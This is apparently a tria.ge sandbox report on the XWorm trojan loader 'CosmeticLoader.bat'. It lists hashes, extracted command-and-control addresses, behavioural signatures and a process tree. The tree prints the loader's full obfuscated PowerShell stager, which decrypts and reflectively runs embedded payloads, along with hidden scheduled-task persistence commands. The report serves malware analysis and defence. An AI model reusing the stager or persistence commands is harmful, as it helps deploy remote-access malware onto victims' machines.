Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
27s -
max time network
17s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
12/09/2024, 08:08
Static task
static1
Behavioral task
behavioral1
Sample
CosmeticLoader.bat
Resource
win10-20240404-en
General
-
Target
CosmeticLoader.bat
-
Size
462KB
-
MD5
d44126df70e3dbdff887215a95e6f3ce
-
SHA1
6d729305d24b9ede2bef06b7885c4348e1899287
-
SHA256
5a1bc7923a04c38975120facb005961068ea9b81cdcbecf7595c9cbcb73dda68
-
SHA512
cd63b04365d8edf905ce2cea4a3c205761d65c0feef67b8840bbc87078d8739ecf735449e8cffdcae48e5f45895f62860dff6acee1da7e8701ded067f0527daf
-
SSDEEP
12288:+vhOfI50mwS2DU3R2ytr9vOH7OCGrGa4c:+vj97IAm7orkc
Malware Config
Extracted
xworm
127.0.0.1:7000
80.76.49.176:7000
-
Install_directory
%AppData%
-
install_file
XClient.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/3928-169-0x00000200C3250000-0x00000200C3272000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4016 powershell.exe 2688 powershell.exe 3928 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4476 XClient.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\Tasks\XClient svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 776 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4016 powershell.exe 4016 powershell.exe 4016 powershell.exe 2688 powershell.exe 2688 powershell.exe 2688 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe 3928 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3112 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4016 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeIncreaseQuotaPrivilege 2688 powershell.exe Token: SeSecurityPrivilege 2688 powershell.exe Token: SeTakeOwnershipPrivilege 2688 powershell.exe Token: SeLoadDriverPrivilege 2688 powershell.exe Token: SeSystemProfilePrivilege 2688 powershell.exe Token: SeSystemtimePrivilege 2688 powershell.exe Token: SeProfSingleProcessPrivilege 2688 powershell.exe Token: SeIncBasePriorityPrivilege 2688 powershell.exe Token: SeCreatePagefilePrivilege 2688 powershell.exe Token: SeBackupPrivilege 2688 powershell.exe Token: SeRestorePrivilege 2688 powershell.exe Token: SeShutdownPrivilege 2688 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeSystemEnvironmentPrivilege 2688 powershell.exe Token: SeRemoteShutdownPrivilege 2688 powershell.exe Token: SeUndockPrivilege 2688 powershell.exe Token: SeManageVolumePrivilege 2688 powershell.exe Token: 33 2688 powershell.exe Token: 34 2688 powershell.exe Token: 35 2688 powershell.exe Token: 36 2688 powershell.exe Token: SeIncreaseQuotaPrivilege 2688 powershell.exe Token: SeSecurityPrivilege 2688 powershell.exe Token: SeTakeOwnershipPrivilege 2688 powershell.exe Token: SeLoadDriverPrivilege 2688 powershell.exe Token: SeSystemProfilePrivilege 2688 powershell.exe Token: SeSystemtimePrivilege 2688 powershell.exe Token: SeProfSingleProcessPrivilege 2688 powershell.exe Token: SeIncBasePriorityPrivilege 2688 powershell.exe Token: SeCreatePagefilePrivilege 2688 powershell.exe Token: SeBackupPrivilege 2688 powershell.exe Token: SeRestorePrivilege 2688 powershell.exe Token: SeShutdownPrivilege 2688 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeSystemEnvironmentPrivilege 2688 powershell.exe Token: SeRemoteShutdownPrivilege 2688 powershell.exe Token: SeUndockPrivilege 2688 powershell.exe Token: SeManageVolumePrivilege 2688 powershell.exe Token: 33 2688 powershell.exe Token: 34 2688 powershell.exe Token: 35 2688 powershell.exe Token: 36 2688 powershell.exe Token: SeIncreaseQuotaPrivilege 2688 powershell.exe Token: SeSecurityPrivilege 2688 powershell.exe Token: SeTakeOwnershipPrivilege 2688 powershell.exe Token: SeLoadDriverPrivilege 2688 powershell.exe Token: SeSystemProfilePrivilege 2688 powershell.exe Token: SeSystemtimePrivilege 2688 powershell.exe Token: SeProfSingleProcessPrivilege 2688 powershell.exe Token: SeIncBasePriorityPrivilege 2688 powershell.exe Token: SeCreatePagefilePrivilege 2688 powershell.exe Token: SeBackupPrivilege 2688 powershell.exe Token: SeRestorePrivilege 2688 powershell.exe Token: SeShutdownPrivilege 2688 powershell.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeSystemEnvironmentPrivilege 2688 powershell.exe Token: SeRemoteShutdownPrivilege 2688 powershell.exe Token: SeUndockPrivilege 2688 powershell.exe Token: SeManageVolumePrivilege 2688 powershell.exe Token: 33 2688 powershell.exe Token: 34 2688 powershell.exe Token: 35 2688 powershell.exe -
Suspicious use of WriteProcessMemory 62 IoCs
description pid Process procid_target PID 5012 wrote to memory of 3684 5012 cmd.exe 75 PID 5012 wrote to memory of 3684 5012 cmd.exe 75 PID 5012 wrote to memory of 4016 5012 cmd.exe 76 PID 5012 wrote to memory of 4016 5012 cmd.exe 76 PID 4016 wrote to memory of 2688 4016 powershell.exe 77 PID 4016 wrote to memory of 2688 4016 powershell.exe 77 PID 4016 wrote to memory of 520 4016 powershell.exe 80 PID 4016 wrote to memory of 520 4016 powershell.exe 80 PID 520 wrote to memory of 3516 520 WScript.exe 81 PID 520 wrote to memory of 3516 520 WScript.exe 81 PID 3516 wrote to memory of 4212 3516 cmd.exe 83 PID 3516 wrote to memory of 4212 3516 cmd.exe 83 PID 3516 wrote to memory of 3928 3516 cmd.exe 84 PID 3516 wrote to memory of 3928 3516 cmd.exe 84 PID 3928 wrote to memory of 3112 3928 powershell.exe 54 PID 3928 wrote to memory of 2556 3928 powershell.exe 45 PID 3928 wrote to memory of 2356 3928 powershell.exe 66 PID 3928 wrote to memory of 1960 3928 powershell.exe 37 PID 3928 wrote to memory of 384 3928 powershell.exe 15 PID 3928 wrote to memory of 1760 3928 powershell.exe 35 PID 3928 wrote to memory of 2544 3928 powershell.exe 44 PID 3928 wrote to memory of 1556 3928 powershell.exe 29 PID 3928 wrote to memory of 1752 3928 powershell.exe 34 PID 3928 wrote to memory of 1352 3928 powershell.exe 26 PID 3928 wrote to memory of 1548 3928 powershell.exe 39 PID 3928 wrote to memory of 2720 3928 powershell.exe 50 PID 3928 wrote to memory of 748 3928 powershell.exe 10 PID 3928 wrote to memory of 2912 3928 powershell.exe 53 PID 3928 wrote to memory of 1728 3928 powershell.exe 33 PID 3928 wrote to memory of 1328 3928 powershell.exe 25 PID 3928 wrote to memory of 2700 3928 powershell.exe 49 PID 3928 wrote to memory of 1320 3928 powershell.exe 24 PID 3928 wrote to memory of 1512 3928 powershell.exe 28 PID 3928 wrote to memory of 1116 3928 powershell.exe 21 PID 3928 wrote to memory of 916 3928 powershell.exe 13 PID 3928 wrote to memory of 1896 3928 powershell.exe 36 PID 3928 wrote to memory of 1060 3928 powershell.exe 19 PID 3928 wrote to memory of 2680 3928 powershell.exe 48 PID 3928 wrote to memory of 2876 3928 powershell.exe 52 PID 3928 wrote to memory of 704 3928 powershell.exe 16 PID 3928 wrote to memory of 4820 3928 powershell.exe 61 PID 3928 wrote to memory of 876 3928 powershell.exe 12 PID 3928 wrote to memory of 1068 3928 powershell.exe 20 PID 3928 wrote to memory of 2636 3928 powershell.exe 46 PID 3928 wrote to memory of 4596 3928 powershell.exe 63 PID 3928 wrote to memory of 1048 3928 powershell.exe 18 PID 3928 wrote to memory of 1240 3928 powershell.exe 23 PID 3928 wrote to memory of 1628 3928 powershell.exe 31 PID 3928 wrote to memory of 1680 3928 powershell.exe 32 PID 3928 wrote to memory of 1212 3928 powershell.exe 22 PID 3928 wrote to memory of 816 3928 powershell.exe 11 PID 3928 wrote to memory of 1404 3928 powershell.exe 27 PID 3928 wrote to memory of 1600 3928 powershell.exe 30 PID 3928 wrote to memory of 4948 3928 powershell.exe 64 PID 3928 wrote to memory of 2188 3928 powershell.exe 40 PID 3928 wrote to memory of 2372 3928 powershell.exe 41 PID 3928 wrote to memory of 596 3928 powershell.exe 17 PID 3928 wrote to memory of 2748 3928 powershell.exe 51 PID 3928 wrote to memory of 776 3928 powershell.exe 85 PID 3928 wrote to memory of 776 3928 powershell.exe 85 PID 1068 wrote to memory of 4476 1068 svchost.exe 87 PID 1068 wrote to memory of 4476 1068 svchost.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch1⤵PID:816
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k rpcss1⤵PID:876
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:916
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:384
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:704
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:596
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:1048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork1⤵PID:1060
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1068 -
C:\Users\Admin\AppData\Roaming\XClient.exeC:\Users\Admin\AppData\Roaming\XClient.exe2⤵
- Executes dropped EXE
PID:4476
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog1⤵PID:1116
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s nsi1⤵PID:1212
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1240
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s EventSystem1⤵PID:1320
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1328
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp1⤵PID:1352
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1404
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1512
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s NlaSvc1⤵PID:1556
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder1⤵PID:1600
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s Dnscache1⤵PID:1628
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1680
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s netprofm1⤵PID:1728
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted1⤵PID:1760
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1896
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s StateRepository1⤵PID:1960
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation1⤵PID:1548
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc1⤵PID:2188
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2372
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2544
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2556
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s CryptSvc1⤵PID:2636
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks1⤵PID:2680
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2700
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2720
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent1⤵PID:2748
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s TokenBroker1⤵PID:2876
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2912
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\CosmeticLoader.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:5012 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twkRdSS9rx0e1GAS+xOYGpTEHiXnefOd1aQP1MfgoFw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iv04Ns0kPKLIVTUZA6Q2SQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Zxwkp=New-Object System.IO.MemoryStream(,$param_var); $JOKcw=New-Object System.IO.MemoryStream; $vznpW=New-Object System.IO.Compression.GZipStream($Zxwkp, [IO.Compression.CompressionMode]::Decompress); $vznpW.CopyTo($JOKcw); $vznpW.Dispose(); $Zxwkp.Dispose(); $JOKcw.Dispose(); $JOKcw.ToArray();}function execute_function($param_var,$param2_var){ $Ekltt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uOQTi=$Ekltt.EntryPoint; $uOQTi.Invoke($null, $param2_var);}$oFsgC = 'C:\Users\Admin\AppData\Local\Temp\CosmeticLoader.bat';$host.UI.RawUI.WindowTitle = $oFsgC;$emRHs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oFsgC).Split([Environment]::NewLine);foreach ($hVxGX in $emRHs) { if ($hVxGX.StartsWith('apqHOrrBYoUaaAYCNYVK')) { $TkgLL=$hVxGX.Substring(20); break; }}$payloads_var=[string[]]$TkgLL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵PID:3684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_323_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3516 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twkRdSS9rx0e1GAS+xOYGpTEHiXnefOd1aQP1MfgoFw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iv04Ns0kPKLIVTUZA6Q2SQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $Zxwkp=New-Object System.IO.MemoryStream(,$param_var); $JOKcw=New-Object System.IO.MemoryStream; $vznpW=New-Object System.IO.Compression.GZipStream($Zxwkp, [IO.Compression.CompressionMode]::Decompress); $vznpW.CopyTo($JOKcw); $vznpW.Dispose(); $Zxwkp.Dispose(); $JOKcw.Dispose(); $JOKcw.ToArray();}function execute_function($param_var,$param2_var){ $Ekltt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uOQTi=$Ekltt.EntryPoint; $uOQTi.Invoke($null, $param2_var);}$oFsgC = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_323.bat';$host.UI.RawUI.WindowTitle = $oFsgC;$emRHs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oFsgC).Split([Environment]::NewLine);foreach ($hVxGX in $emRHs) { if ($hVxGX.StartsWith('apqHOrrBYoUaaAYCNYVK')) { $TkgLL=$hVxGX.Substring(20); break; }}$payloads_var=[string[]]$TkgLL.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "6⤵PID:4212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:776
-
-
-
-
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4820
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4596
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:4948
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:2356
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
50KB
MD52143b379fed61ab5450bab1a751798ce
SHA132f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA5120bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa
-
Filesize
2KB
MD5aeb24b5729d62e81a27174f46d431126
SHA1baa02ac3f99822d1915bac666450dc20727494bb
SHA256d2b2e09bffd835255b1fb57c2aa92e5c28c080eb033e1f042087d36a93393471
SHA512e62f6771339326a90f03b79f8a3321c4f00d66e5f228055f17b75d028895f80ce374bd0143ec971f55efa861b949ec672bfda9df7fb45444b17f3dbe479a5415
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
462KB
MD5d44126df70e3dbdff887215a95e6f3ce
SHA16d729305d24b9ede2bef06b7885c4348e1899287
SHA2565a1bc7923a04c38975120facb005961068ea9b81cdcbecf7595c9cbcb73dda68
SHA512cd63b04365d8edf905ce2cea4a3c205761d65c0feef67b8840bbc87078d8739ecf735449e8cffdcae48e5f45895f62860dff6acee1da7e8701ded067f0527daf
-
Filesize
124B
MD5f7de4b9f14c10d5abaa492c2c3df7232
SHA1b4ecb2a31cfda13694563e47afdbd0352f01d51c
SHA256b019b61f2bd0c425e83c1431e670e1cef0c87a703fdcd04f1a6eea9378f9c8cb
SHA5121bbdc6505ae290437de19afc063dbbb45e85a99ecefae1f3d702e94c7ff4da67d3d4a5cb3b2910228b465bf0eca90a33f212c0ba88b8893b4a1b2a71b913027c
-
Filesize
435KB
MD5f7722b62b4014e0c50adfa9d60cafa1c
SHA1f31c17e0453f27be85730e316840f11522ddec3e
SHA256ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA5127fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4